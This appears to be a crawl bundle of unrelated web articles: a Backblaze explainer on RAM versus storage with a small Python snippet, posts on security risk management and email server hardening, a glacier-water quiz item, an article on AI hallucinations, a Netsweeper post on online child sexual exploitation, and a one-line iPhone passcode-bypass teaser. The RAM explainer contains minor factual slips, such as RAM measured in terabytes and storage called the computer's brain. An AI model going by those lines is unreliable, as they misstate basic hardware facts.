drive (SSD). Compared with RAM, this type of storage is non-volatile, which means it retains information even when a device is powered off. 
You can think of storage like a filing cabinet—a place next to your desk where you can retrieve information as needed. RAM vs. Storage: How Do They Compare? Speed and Performance Two of the primary differences between RAM and storage are speed and performance. RAM is significantly faster than storage. Data stored in RAM can be written and accessed almost instantly, so it's very fast—nanoseconds fast. DDR4 RAM, one of the newer types of RAM technology, is capable of a peak transfer rate of 25.6GB/s! RAM has a very fast path to the computer's central processing unit (CPU), the brain of the computer that does most of the work. Storage, while slower in comparison, is responsible for holding the operating system (OS), applications, and user data for the long term—it should still be fast, but it doesn't need to be as fast as RAM. That said, computer storage is getting faster thanks to the popularity of SSDs. SSDs are much faster than hard drives since they use integrated circuits instead of mechanical platters that have to be read sequentially, like HDDs. SSDs use a special type of memory circuitry called non-volatile RAM (NVRAM) to store data, so those shorter term memory access points stay in place even when the computer is turned off. Even though SSDs are faster than HDDs, they're still slower than RAM. There are two reasons for that difference in speed. First, the memory chips in SSDs are slower than those in RAM. Second, there is a bottleneck created by the interface that connects the storage device to the computer. RAM, in comparison, has a much faster interface. Capacity and Size RAM is typically smaller in capacity compared to storage. It is measured in gigabytes (GB) or terabytes (TB), whereas storage capacities can reach multiple terabytes or even petabytes. The smaller size of RAM is intentional, as it is designed to store only the data currently in use, ensuring quick access for the processor. 
Volatility and Persistence Another key difference is the volatility of RAM and the persistence of storage. RAM is volatile, meaning it loses its data when the power is turned off or the system is rebooted. This makes it ideal for quick data access and manipulation, but unsuitable for long-term storage. Storage is non-volatile or persistent, meaning it retains data even when the power is off, making it suitable for holding files, applications, and the operating system over extended periods. How Much RAM Do I Have? Understanding how much RAM you have might be one of your first steps for diagnosing computer performance issues. Use the following steps to confirm how much RAM your computer has installed. We’ll start with an Apple computer. Click on the Apple menu and then click About This Mac. In the screenshot below, we can see that the computer has 16GB of RAM. With a Windows 11 computer, use the following steps to see how much RAM you have installed. Open the Control Panel by clicking the Windows button and typing “control panel,” then click System and Security, and then click System. Look for the line “Installed RAM.” In the screenshot below, you can see that the computer has 32GB of RAM installed. How Much Computer Storage Do I Have? To view how much free storage space you have available on a Mac computer, use these steps. Click on the Apple menu, then System Settings, select General, and then open Storage. In the screenshot below, we’ve circled where your available storage is displayed. With a Windows 11 computer, it is also easy to view how much available storage space you have. Click the Windows button and type in “file explorer.” When File Explorer opens, click on This PC from the list of options in the left-hand pane. In the screenshot below, we’ve circled where your available storage is displayed (in this case, 200GB). 
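The GUI steps above also have programmatic equivalents. The sketch below uses only the Python standard library: `shutil.disk_usage` reports storage space on any platform, while the RAM estimate relies on `os.sysconf` names that are only available on Linux and similar systems. The mount point `"/"` is an assumption you may need to adjust (e.g., to `"C:\\"` on Windows).

```python
import os
import shutil

def storage_summary(path: str = "/") -> tuple[int, int, int]:
    """Return (total, used, free) bytes for the filesystem holding `path`."""
    usage = shutil.disk_usage(path)
    return usage.total, usage.used, usage.free

def total_ram_bytes() -> int:
    """Estimate installed RAM via sysconf (Linux/Unix only)."""
    return os.sysconf("SC_PAGE_SIZE") * os.sysconf("SC_PHYS_PAGES")

total, used, free = storage_summary("/")
print(f"Storage: {free / 1e9:.1f} GB free of {total / 1e9:.1f} GB")
try:
    print(f"RAM: {total_ram_bytes() / 1e9:.1f} GB installed")
except (AttributeError, ValueError, OSError):
    # os.sysconf is missing or lacks these names on some platforms.
    print("RAM size lookup not supported on this platform")
```

This mirrors what the system dialogs show: the installed RAM figure corresponds to "Installed RAM" / "About This Mac", and the free-space figure to the storage panes described above.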
How RAM and Storage Affect Your Computer's Performance For most general-purpose uses of computers—email, writing documents, surfing the web, or watching Netflix—the RAM that comes with our computer is enough. If you own your computer for a long enough time, you might need to add a bit more to keep up with memory demands from newer apps and OSes. Specifically, more RAM makes it possible for you to use more apps, documents, and larger files at the same time. People who work with very large files like large databases, videos, and images can benefit significantly from having more RAM. If you regularly use large files, it is worth checking to see if your computer's RAM is upgradeable. Adding More RAM to Your Computer In some situations, adding more RAM is worth the expense. For example, editing videos and high-resolution images takes a lot of memory. In addition, high-end audio recording and editing as well as some scientific work require significant RAM. However, not all computers allow you to upgrade RAM. For example, the Chromebook typically has a fixed amount of RAM, and you cannot install more. So, when you're buying a new computer (particularly if you plan on using that computer for more than five years), make sure you 1) understand how much RAM the computer has, and 2) know whether its RAM can be upgraded. When your computer's RAM is filled up, your computer has to get creative to keep working. Specifically, your computer starts to temporarily use your hard drive or SSD as "virtual memory." If you have relatively fast storage like an SSD, virtual memory will be fast. On the other hand, using a traditional hard drive will be fairly slow. Besides RAM, the most serious bottleneck to improving performance in your computer can be your storage. Even with plenty of RAM installed, computers need to read and write information from the storage system (i.e., the HDD or the SSD). Hard drives come in different speeds and sizes. 
For laptops and desktops, the most common RPM rates are between 5400–7200RPM. In some cases, you might even decide to use a 10,000RPM drive. Faster drives cost more, are louder, have greater cooling needs, and use more power, but they may be a good option. New disk technologies enable hard drives to be bigger and faster. These technologies include filling the drive with helium instead of air to reduce disk platter friction and using heat or microwaves to improve disk density, such as with heat-assisted magnetic recording (HAMR) drives and microwave-assisted magnetic recording (MAMR) drives. Today, SSDs are becoming increasingly popular for computer storage. This type of computer storage is popular because it is faster, cooler, and takes up less space than traditional hard drives. They’re also less susceptible to magnetic fields and physical jolts, which makes them great for laptops. For more about the difference between HDDs and SSDs, check out our post, “Hard Disk Drive (HDD) vs. Solid-state Drive (SSD): What’s the Diff?” Adding More Computer Storage As a user’s disk storage needs increase, typically they will look to larger drives to store more data. The first step might be to replace an existing drive with a larger, faster drive. Or you might decide to install a second drive. One approach is to use different drives for different purposes. For example, use an SSD for the operating system, and then store your business videos on a larger SSD. If more storage space is needed, you can also use an external drive, most often using USB or Thunderbolt to connect to the computer. This can be a single drive or multiple drives and might use a data storage virtualization technology such as RAID to protect the data. If you have really large amounts of data, or simply wish to make it easy to share data with others in your location or elsewhere, you might consider network-attached storage (NAS). 
A NAS device can hold multiple drives, typically uses a data virtualization technology like RAID, and is accessible to anyone on your local network and—if you wish—on the internet, as well. NAS devices can offer a great deal of storage and other services that typically have been offered only by dedicated network servers in the past. Back Up Early and Often As a cloud storage company, we’d be remiss not to mention that you should back up your computer. No matter how you configure your computer’s storage, remember that technology can fail (we know a thing or two about that). You always want a backup so you can restore everything easily. The best backup strategy shouldn’t be dependent on any single device, either. Your backup strategy should always include three copies of your data on two different mediums with one off-site. FAQs About Differences Between RAM and Storage Internal storage is a method of data storage that writes data to a disk, holding onto that data until it’s erased. Think of it as your computer’s brain. RAM is a method of communicating data between your device’s CPU and its internal storage. Think of it as your brain’s short-term memory and ability to multi-task. The data the RAM receives is volatile, so it will only last until it’s no longer needed, usually when you turn off the power or reset the computer. If you’re looking for better PC performance, you can upgrade either RAM or storage for a boost in performance. More RAM will make it easier for your computer to perform multiple tasks at once, while upgrading your storage will improve battery life, make it faster to open applications and files, and give you more space for photos and applications. This is especially true if you’re switching your storage from a hard disk drive (HDD) to a solid state drive (SSD). More RAM does not provide you with more free space. 
If your computer is giving you notifications that you’re getting close to running out of storage or you’ve already started having to delete files to make room for new ones, you should upgrade the internal storage, not the RAM. Memory and storage are also not the same thing, even though the words are often used interchangeably. Memory is another term for RAM.
<urn:uuid:3c0c6a3d-1650-4803-afcb-5178e126b165>
CC-MAIN-2024-38
https://www.backblaze.com/blog/whats-diff-ram-vs-storage/
2024-09-13T14:28:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00360.warc.gz
en
0.938816
2,595
3.390625
3
Perfect security is not possible, not feasible, and not required by law. In fact, information security laws and regulations require that we provide “reasonable and appropriate” security through a well-defined risk management process. Without a risk-based approach, organizations attempt to address information security requirements either by trying to comply with a long list of security controls, or by investing in defenses against the security threats that most recently made the news. But regulations are written so that organizations can thoughtfully consider what threats are foreseeable, and what the potential impacts would be. Security controls should then be applied to bring those risks down to a level that the organization could accept. Organizations care about information security not only because they need their systems and information to be secured, but because they want to avoid the impacts of a security breach. In the U.S., the impacts most often translate to fines, lawsuits and loss of business. But laws, regulations and the courts have long held that applying due care and due diligence reduces liabilities. By managing information security through a risk assessment, we not only follow the law, we ensure that our security investments are appropriate to our business. A formal information risk assessment, as described by these laws and regulations, helps management to think through which of their information assets could create problems for the public, for the organization or for their clients if compromised. When risks are calculated in terms of “impacts,” then “due care” can be defined in clear terms that are as understandable to executive management as they are to technical managers and their constituents. Moreover, security investments can be planned so that they are proportional to the risk that they address. We are in an arms race with criminals who want to disrupt business operations and steal data. 
These organizations have different aims but the one common theme is the unauthorized access and use of computer systems to fulfill their mission. Their missions vary but their attacks include: - Stealing and selling data (intellectual property, personally identifiable information, etc.) - Gaining control over computer resources - Spreading infections (through botnets) - Proving a point to perceived enemies - Monitoring actions and decisions of organizations and nation states - Disrupting business as political activism While we are at a disadvantage in knowing what threats will occur and when, we can protect ourselves, our interests, and the interests of our stakeholders if we systematically consider these risks and manage a plan for reducing their likelihood and impact. On the occasion that these threats do occur, we will be better prepared either to defend against them, or to reduce the impacts. This is precisely what the laws are telling us to do. The benefits of a mature risk management system include the ability to: - Demonstrate compliance with contracts, laws, and regulations - Identify threats and risks that were previously unknown or not prioritized correctly - Differentiate from a marketing perspective - Demonstrate due care to interested parties and clients - Align the interests of IT, Executive Management, and Internal Audit - Make efficient use of limited funds to maximize security spend - Identify the biggest risks that need to be treated - Reduce/eliminate ad-hoc risk assessing from staff
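The prioritization described above — scoring foreseeable threats by likelihood and impact so the biggest risks get treated first — can be illustrated with a toy risk register. This is a sketch only: the 1–5 scales, threat names, and scores below are hypothetical and not drawn from any standard or real assessment.

```python
# Toy risk register: rank threats by likelihood x impact (each scored 1-5).
# Illustrative only; real frameworks use richer scales and criteria.

def rank_risks(risks: list[dict]) -> list[dict]:
    """Score each risk as likelihood * impact and sort highest first."""
    for r in risks:
        r["score"] = r["likelihood"] * r["impact"]
    return sorted(risks, key=lambda r: r["score"], reverse=True)

register = [
    {"threat": "Stolen customer data", "likelihood": 3, "impact": 5},
    {"threat": "Botnet infection", "likelihood": 4, "impact": 2},
    {"threat": "Website defacement", "likelihood": 2, "impact": 2},
]

for risk in rank_risks(register):
    print(f'{risk["threat"]}: {risk["score"]}')
```

Even a simple ranking like this makes "due care" discussable in impact terms: the top-scored items are the ones whose treatment (controls, insurance, acceptance) management must justify first.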
<urn:uuid:9307411c-7d01-40d3-b87e-6b76c90ad0dd>
CC-MAIN-2024-38
https://www.halock.com/unlimited-security-budgets-perfect-security/
2024-09-13T14:52:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00360.warc.gz
en
0.961306
657
2.75
3
In today’s fast-paced digital world, email has become an indispensable tool for communication in both personal and professional spheres. From exchanging critical business information to connecting with friends and family, email plays a pivotal role in our daily lives. However, with the increasing reliance on email comes the need to ensure its security, integrity, and reliability. Email security is paramount to protecting sensitive data, maintaining message integrity, and thwarting potential threats such as phishing attacks, malware distribution, and unauthorized access. By implementing robust security measures, organizations can mitigate risks and safeguard their email infrastructure against evolving cyber threats. This guide explores email server security best practices and provides valuable insights for safeguarding email communications. What is a secure email server? A secure email server is a computer system responsible for sending, receiving, and storing emails securely. It ensures that email communications remain confidential and protected from unauthorized access or tampering. For a detailed guide on setting up an email server, you’re welcome to refer to NinjaOne’s comprehensive email server guide. The role of a secure email server extends beyond mere message delivery. It serves as a cornerstone for data integrity and confidentiality, providing a secure channel for transmitting sensitive information, confidential documents, and critical business communications. These servers implement various encryption techniques, authentication mechanisms, access controls, and monitoring systems to safeguard sensitive information transmitted via email. Key features of a secure email server - Encryption: Secure email servers use encryption protocols such as Transport Layer Security (TLS) or Pretty Good Privacy (PGP) to encrypt email messages in transit and at rest. This ensures that emails cannot be intercepted or accessed by unauthorized parties. 
- Authentication: Secure email servers enforce strong authentication mechanisms to verify the identities of users sending and receiving emails. This often involves multi-factor authentication (MFA) or digital certificates to prevent unauthorized access to email accounts. - Access controls: Access controls are implemented to restrict access to email accounts and ensure that only authorized users can view, send, or modify emails. Role-based access controls (RBAC) and permission settings help enforce these access restrictions. - Anti-malware and anti-spam protection: Secure email servers include built-in anti-malware and anti-spam filters to detect and block malicious attachments, phishing emails, and spam messages. These filters help prevent email-borne threats from reaching users’ inboxes. - Data Loss Prevention (DLP): DLP mechanisms are employed to prevent the unauthorized disclosure of sensitive information through email. DLP policies are able to detect and block emails that contain confidential data such as social security numbers, credit card numbers, or intellectual property. - Auditing and logging: Secure email servers maintain comprehensive audit logs of email activities, including message delivery, access attempts, and configuration changes. These logs are essential for monitoring and investigating security incidents or compliance violations. - Secure configuration: Secure email servers are configured according to industry best practices and security standards to minimize the risk of vulnerabilities and ensure a hardened security posture. This includes regular patching, disabling unnecessary services, and implementing security baselines. 10 email server security best practices In addition to the technologies leveraged by secure email servers, the following configuration best practices should be adopted to optimize overall security posture: #1. 
Change default passwords Default passwords pose a significant security risk as they are often easily exploited by attackers. It’s essential to change default passwords promptly upon setting up an email server to prevent unauthorized access. When creating new passwords, opt for strong and unique combinations of characters, including uppercase and lowercase letters, numbers, and special symbols. Avoid using easily guessable passwords such as “password123” or common phrases. Consider using password management tools to generate and securely store complex passwords. #2. Setup SMTP authentication SMTP (Simple Mail Transfer Protocol) authentication is a mechanism used to verify the identity of users sending emails through an email server. Enabling SMTP authentication helps prevent unauthorized users from relaying emails through the server, minimizing the risk of spamming and abuse. Configure SMTP authentication settings within your email server’s administration panel. This typically involves enabling authentication options such as SMTP AUTH (Authentication) and configuring authentication credentials for valid users. #3. Protect with MTA STS Mail Transfer Agent Strict Transport Security (MTA STS) is a security mechanism designed to enforce secure communication between mail servers, mitigating the risk of man-in-the-middle attacks and eavesdropping during email transmission. It ensures that email traffic is encrypted and authenticated, enhancing overall email security. Implementing MTA STS involves configuring your email server to support the MTA STS protocol and publishing MTA STS policies in DNS records. This enables other mail servers to verify the authenticity of your server and enforce secure connections when exchanging emails. #4. Use secure email protocols Secure email protocols such as TLS (Transport Layer Security) and SSL (Secure Sockets Layer) encrypt email data during transit, preventing interception and unauthorized access by malicious actors. 
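On the client side, the SMTP AUTH and TLS protections described in #2 and #4 look roughly like the sketch below, using Python's standard `smtplib` and `ssl` modules. The host `mail.example.com`, port 587, and the credentials are placeholders: this is an illustrative sketch, not a definitive implementation, and the actual connection requires a real server.

```python
import smtplib
import ssl

def make_tls_context() -> ssl.SSLContext:
    """Build a TLS context with certificate and hostname verification on."""
    context = ssl.create_default_context()
    # create_default_context() already enables these; set explicitly
    # here to make the security posture obvious.
    context.check_hostname = True
    context.verify_mode = ssl.CERT_REQUIRED
    return context

def send_secure(host: str, user: str, password: str,
                message: str, recipient: str) -> None:
    """Send a message over STARTTLS with SMTP AUTH (placeholder host/creds)."""
    context = make_tls_context()
    with smtplib.SMTP(host, 587) as server:
        server.starttls(context=context)  # upgrade the session to TLS
        server.login(user, password)      # SMTP AUTH over the encrypted channel
        server.sendmail(user, [recipient], message)

# Example call (will only succeed against a real, reachable server):
# send_secure("mail.example.com", "user@example.com", "s3cret",
#             "Subject: test\r\n\r\nhello", "dest@example.net")
```

Note that authenticating only after `starttls()` keeps the credentials off the wire in plaintext, which is exactly why #2 (SMTP AUTH) and #4 (secure protocols) work best together.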
It’s essential to configure your email server to use these encryption protocols to protect sensitive information. Configure your email server software to support TLS and SSL encryption for incoming and outgoing email connections. This involves enabling encryption options within the server settings and ensuring that SSL/TLS certificates are properly installed and configured. #5. Configure reverse DNS Reverse DNS (Domain Name System) is a technique used to associate IP addresses with domain names, helping verify the legitimacy of email senders and detect potential spoofing or phishing attempts. Configuring reverse DNS for your email server enhances email authenticity and security. To set up reverse DNS, contact your DNS provider or hosting provider to create and configure reverse DNS records for your email server’s IP address. Ensure that the reverse DNS records accurately reflect the hostname and domain associated with your email server. #6. Implement email firewalls Email firewalls act as a frontline defense against malicious emails, filtering out spam, phishing attempts, malware, and other email-based threats before they reach users’ inboxes. Deploying email firewalls helps protect your email server and network infrastructure from potential security breaches and data loss. There are various types of email firewalls available, including perimeter email gateways, cloud-based email security services, and software-based email filtering solutions. Choose a solution that aligns with your organization’s security requirements and integrates seamlessly with your email server. #7. Update & patch servers regularly Keeping email server software up to date is critical for addressing known vulnerabilities, bugs, and security flaws that could be exploited by attackers. Regular software updates and patches help maintain the integrity and security of your email server environment. 
Establish a routine schedule for applying updates and patches to your email server software, operating system, and associated components. Monitor vendor announcements, security advisories, and patch release notes to stay informed about the latest updates and security fixes. #8. Activate SPF to prevent spoofing Sender Policy Framework (SPF) is an email authentication method that helps prevent email spoofing and forged sender addresses by verifying the authenticity of email senders. By configuring SPF records for your domain, you can specify which servers are authorized to send emails on your behalf, reducing the risk of spoofed emails being delivered. To configure SPF records, access your domain’s DNS settings and add a TXT record containing the SPF policy information. Specify the IP addresses or hostnames of authorized email servers using the SPF syntax and set the appropriate SPF policy for your domain. #9. Limit access to your email server Access control measures are essential for restricting unauthorized access to your email server and preventing potential security breaches. Implement granular access controls, user authentication mechanisms, and privilege management policies to control who can access sensitive email data and server resources. Define user roles, permissions, and access levels based on job responsibilities and the principle of least privilege. Utilize username/password authentication, multi-factor authentication (MFA), and IP-based access restrictions to authenticate and authorize users for secure server management. #10. Provide training Educating employees about email security best practices is crucial for building a security-aware culture and mitigating the risk of human error-related security incidents. Develop a comprehensive training program covering various aspects of email security, including identifying phishing emails, recognizing suspicious attachments, and practicing safe email usage habits. 
Conduct regular training sessions, workshops, and awareness campaigns to reinforce email security awareness among employees. Provide practical examples, real-world scenarios, and interactive learning materials to engage employees and promote active participation in email security training initiatives.

Enhance the resilience and integrity of your email infrastructure

Email is integral to communications worldwide. However, with the convenience and ubiquity of email come several security challenges, ranging from phishing attacks and malware distribution to data breaches and unauthorized access. Securing your email server is not just a matter of safeguarding sensitive information – it’s a fundamental aspect of maintaining business continuity, protecting customer trust, and upholding regulatory compliance standards.
<urn:uuid:6a9711cf-e54f-4900-9f46-c596502cc695>
CC-MAIN-2024-38
https://www.ninjaone.com/blog/email-server-security-best-practices/
2024-09-14T20:18:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00260.warc.gz
en
0.883007
1,871
2.921875
3
How important are Earth's fresh water reserves?

What percentage of Earth’s water is found in glaciers?

The correct answer is A) 2.15%

Water is a precious resource that is essential for life on Earth. One of the important sources of fresh water on our planet is glaciers. These massive ice formations hold a significant amount of the Earth's freshwater reserves. Glaciers play a crucial role in regulating the global water cycle by storing water as ice and releasing it gradually over time. As temperatures rise and glaciers melt, the fresh water they contain becomes available for various purposes such as drinking water, agriculture, and hydropower generation.

It is important to understand the distribution of Earth's water resources, including the percentage of water stored in glaciers. By knowing this information, scientists and policymakers can better manage and protect these valuable freshwater reserves for the benefit of current and future generations.
<urn:uuid:40abd2f0-2f68-4605-bd73-cff0c6cc99e6>
CC-MAIN-2024-38
https://bsimm2.com/sat/the-importance-of-earth-s-fresh-water-reserves.html
2024-09-17T07:59:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00060.warc.gz
en
0.938915
182
3.671875
4
In recent years, the rapid development of artificial intelligence (AI) has led to the rise of sophisticated language models, with OpenAI’s ChatGPT at the forefront. While these powerful tools have revolutionized various industries, they also come with their own set of challenges. One of the most concerning issues is the phenomenon of hallucination. In this article, we will demystify this term, explore why it’s a problem, and discuss ongoing efforts to mitigate it.

What is hallucination in AI?

Hallucination in AI refers to the generation of outputs that may sound plausible but are either factually incorrect or unrelated to the given context. These outputs often emerge from the AI model's inherent biases, lack of real-world understanding, or training data limitations. In other words, the AI system "hallucinates" information that it has not been explicitly trained on, leading to unreliable or misleading responses.

Examples of AI hallucinations

Here are two examples of what hallucinations in ChatGPT might look like:

User input: "When did Leonardo da Vinci paint the Mona Lisa?"
AI-generated response: "Leonardo da Vinci painted the Mona Lisa in 1815." (Incorrect: The Mona Lisa was painted between 1503 and 1506, and possibly reworked until 1517.)

User input: "Tell me a fact about George Washington."
AI-generated response: "George Washington was known for inventing the cotton gin." (Unrelated: Eli Whitney, not George Washington, invented the cotton gin.)

Why is hallucination a problem?

- Erosion of trust: When AI systems produce incorrect or misleading information, users may lose trust in the technology, hampering its adoption across various sectors.
- Ethical concerns: Hallucinated outputs can potentially perpetuate harmful stereotypes or misinformation, making AI systems ethically problematic.
- Impact on decision-making: AI systems are increasingly used to inform critical decisions in fields such as finance, healthcare, and law.
Hallucinations can lead to poor choices with serious consequences.
- Legal implications: Inaccurate or misleading outputs may expose AI developers and users to potential legal liabilities.

Efforts to address hallucination in AI

There are various ways these models can be improved to reduce hallucinations; these include:

- Improved training data: Ensuring that AI systems are trained on diverse, accurate, and contextually relevant datasets can help minimize the occurrence of hallucinations.
- Red teaming: AI developers can simulate adversarial scenarios to test the AI system's vulnerability to hallucinations and iteratively improve the model.
- Transparency and explainability: Providing users with information on how the AI model works and its limitations can help them understand when to trust the system and when to seek additional verification.
- Human-in-the-loop: Incorporating human reviewers to validate the AI system's outputs can mitigate the impact of hallucinations and improve the overall reliability of the technology.

As ChatGPT and similar AI systems become more prevalent, addressing the phenomenon of hallucination is essential for realizing the full potential of these technologies. By understanding the causes of hallucination and investing in research to mitigate its occurrence, AI developers and users can help ensure that these powerful tools are used responsibly and effectively.
<urn:uuid:e7cca7f9-507b-40c1-b2eb-845f2715bc3e>
CC-MAIN-2024-38
https://bernardmarr.com/chatgpt-what-are-hallucinations-and-why-are-they-a-problem-for-ai-systems/
2024-09-18T12:41:12Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00860.warc.gz
en
0.92185
670
3.5625
4
Warning: This blog contains content on sexual abuse which may be triggering.

It’s no surprise that the COVID-19 pandemic has increased the risk of online sexual exploitation for children. Since the global lockdown, many people are spending more time online, and so are predators – what could be more dangerous than quarantined child sex offenders being able to communicate with vulnerable children who are also confined at home?

What is Online Sexual Exploitation

Online child sexual exploitation refers to the use of the internet or communication technologies as a way to facilitate the sexual abuse of children and adolescents. According to Compassion Canada, online sexual exploitation, also known as cybersex trafficking, is the act of forcing children to remove their clothes and perform unspeakable acts in front of a cell phone or computer camera. These videos are streamed to online predators from anywhere in the world in real time—in most cases, by their own parents or relatives.

“In 2021, IWF investigated 361,000 reports. Of those, 252,000 were confirmed to be URLs containing images or videos of child sexual abuse. The 2021 figures show a 21% rise in the number of reports investigated, and a 64% increase in the number of actioned reports.”

What Does Online Child Exploitation Look Like?

No child is immune to the possibility of sexual exploitation. Regardless of age, race, gender, or background, it exists and can include a wide range of behaviours and situations. As the number of children accessing the internet increases, so do the opportunities for children to be enticed and exploited.

- Online Grooming: A technique predators use to befriend or develop a relationship with a minor in order to gain their trust. This can include gifts, money, flattery, etc.
- Sextortion: Coercing a victim into giving sexually explicit material, including images or videos, through threats or manipulation.
- Child Sexual Abuse Material (CSAM): Distributing, creating, or sharing any images or videos of children that depict them engaged in any form of sexual activity.
- Self-generated Sexual Material: Sexually explicit content of a child, taken by the child, who is under eighteen.

Who is Most at Risk?

Although online sexual exploitation occurs in every country and across all levels of society, children in poverty are the most vulnerable. Predators tend to target children who are the poorest, most desperate, and live in isolated communities. A family in poverty sometimes has limited options. Exploiting their child, even by selling a photo, promises fast money that can earn them in a week what they would otherwise make in a year.

In much of the developing world, millions of children continue to suffer sexual exploitation and are subjected to other exploitative practices, including prostitution and pornography. One country in particular is the Philippines. Despite updated legislation in the Philippines, including the Anti-Trafficking in Persons Act, the Cybercrime Prevention Act, and the Anti-Child Pornography Law, an increase in reports of online sexual exploitation of children in the Philippines has been recorded by The National Center for Missing and Exploited Children (NCMEC).

Netsweeper’s Commitment to Combat

The dark web has continued to keep up with cutting-edge technology and trends to create and distribute CSAM to further exploit children, making it difficult for governments and law enforcement to prosecute these terrible crimes. Luckily, cybersecurity software now exists to help block this disturbing content and fight against these rising threats. Netsweeper’s nFilter web filtering platform finds suspected CSAM URLs and reports them to partner organizations, including the Internet Watch Foundation and the Canadian Centre for Child Protection, for investigation and further action.
We are also partners with alliances including WeProtect and Project Arachnid, which are dedicated to creating a digital world that protects children from sexual exploitation and abuse by bringing together experts and using detection technology to develop policies and solutions that protect children. You can read more about what Netsweeper stands for on our Social Responsibility page.
<urn:uuid:373f1f4a-c8ec-4a51-9781-544e79a3729c>
CC-MAIN-2024-38
https://www.netsweeper.com/government/children-risk-sexual-exploitation
2024-09-18T10:30:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00860.warc.gz
en
0.940982
838
3.140625
3
Creating automated tests for a web application can be challenging. Two of the biggest barriers to getting started are picking an automation tool and developing a framework for writing the tests. This course explores how to use the popular browser automation framework, Selenium, to create automated tests for web applications. We will examine using Selenium to directly record from within a Firefox browser, as well as using C# to automate the web browser using Selenium's API. We will also explore how to distribute tests over multiple machines using Selenium Server's grid capabilities. The course concludes with the implementation of a simple, maintainable framework for testing a web application using Selenium.
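The "simple, maintainable framework" the course builds toward usually means the page-object pattern: tests call methods on a page class instead of scattering element lookups everywhere. Here is a minimal sketch of that pattern in Python; the page class, locators, and the stub driver are all hypothetical, and in a real suite you would pass in an actual Selenium WebDriver instead of the fake one used here so the example runs without a browser:

```python
class LoginPage:
    """Page object: wraps the locators and actions for a login screen,
    so tests talk to the page, not to raw element lookups."""

    USERNAME = ("id", "username")
    PASSWORD = ("id", "password")
    SUBMIT = ("id", "submit")

    def __init__(self, driver):
        self.driver = driver

    def log_in(self, user, password):
        self.driver.find_element(*self.USERNAME).send_keys(user)
        self.driver.find_element(*self.PASSWORD).send_keys(password)
        self.driver.find_element(*self.SUBMIT).click()


class FakeElement:
    """Stand-in for a WebElement; records actions instead of driving a browser."""
    def __init__(self, log, locator):
        self.log, self.locator = log, locator

    def send_keys(self, text):
        self.log.append(("type", self.locator, text))

    def click(self):
        self.log.append(("click", self.locator))


class FakeDriver:
    """Stand-in for a Selenium WebDriver."""
    def __init__(self):
        self.log = []

    def find_element(self, by, value):
        return FakeElement(self.log, (by, value))


driver = FakeDriver()
LoginPage(driver).log_in("alice", "secret")
print(driver.log[-1])  # ('click', ('id', 'submit'))
```

When the site's login form changes, only `LoginPage` needs updating — every test that calls `log_in` keeps working, which is the maintainability payoff the course description alludes to.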
<urn:uuid:bfdcbc8d-563c-480c-b039-cd302c9e246f>
CC-MAIN-2024-38
https://www.mytechlogy.com/Online-IT-courses-reviews/23822/automated-web-testing-with-selenium/
2024-09-08T19:23:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00860.warc.gz
en
0.849344
129
2.84375
3
As the world's data continues growing at an exponential rate year after year, cybercriminals have come up with highly sophisticated ways to get access to your personal information, using everything from simple password hacks to malware attacks and even phishing scams. This means that if you want to stay protected against all types of potential attacks, choosing a good, strong password is an important first step.

Passwords protect sensitive information that is critical to your life. Whether it is your social media account or your bank information, important personal details lie behind your password. It could be detrimental to your entire career or life if the wrong individuals were to compromise those details. Creating a secure password is therefore crucial to protecting your personal information, and by following a few basic steps, you can easily create a highly secure password for maximum protection.

Check Out The Top 5 Tips For a Secure Password

- Ensuring 2-Factor Authentication (2FA): 2FA or 2-factor Authentication is an extra layer of security used to prove that the individual trying to access the account is who they claim to be. During the sign-up stage, users are asked specific questions about their lives. These questions are then used for security: every time the user logs in to the account, they fill in the password and answer a security question to validate that they are the rightful owner of the account.
- Longer Passwords: The longer the password is, the harder it becomes to crack. Use unique passwords for all enterprise assets – at a minimum, an 8-character password for accounts using Multi-factor Authentication (MFA) and a 14-character password for accounts not using MFA. Try using random phrases, numbers, or characters.
- Use Nonsense Phrases: Long passwords that include random words and phrases that are not grammatically correct will be harder to crack.
Stay away from proper nouns and other standalone dictionary words, which can lead to an insecure password.
- Use Single Sign-On (SSO) and a Password Manager: SSO helps reduce the number of passwords a user must manage when companies handle many enterprise and cloud applications. Password managers and similar tools manage all your passwords in a centralized location, helping you keep track of every password so that you can update information on a regular basis.
- Avoid personal information: Strong passwords shouldn't include references to personal information such as names, birthdays, addresses, or phone numbers.

For further information and guidance on the creation and use of passwords, see the CIS Password Policy Guide.
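The length and variety tips above can be sketched as a simple checker. The 8/14-character thresholds follow the MFA/no-MFA minimums mentioned in the tips; the function name and the three-character-class rule are our own illustrative choices, not part of any standard:

```python
import string

def password_ok(password, has_mfa=False):
    """Check a password against the minimum-length and variety tips above."""
    min_length = 8 if has_mfa else 14
    if len(password) < min_length:
        return False
    classes = [
        any(c in string.ascii_lowercase for c in password),
        any(c in string.ascii_uppercase for c in password),
        any(c in string.digits for c in password),
        any(c in string.punctuation for c in password),
    ]
    return sum(classes) >= 3  # require at least three character classes

print(password_ok("correct-Horse7battery"))  # True: long, mixed classes
print(password_ok("Pass123!"))               # False: only 8 chars without MFA
```

A real policy engine would also reject dictionary words and personal information, as the tips advise; this sketch only covers the mechanical length-and-variety part.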
<urn:uuid:08104bf5-654f-4fe1-af10-75ce33071f43>
CC-MAIN-2024-38
https://www.calcomsoftware.com/top-5-tips-for-a-secure-password/
2024-09-10T00:58:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651164.37/warc/CC-MAIN-20240909233606-20240910023606-00760.warc.gz
en
0.908701
528
3.046875
3
A security researcher has identified a process that could bypass the iOS passcode attempt limit on the iPhone 5c smartphone.

The iOS Password Limit Can Be Overcome

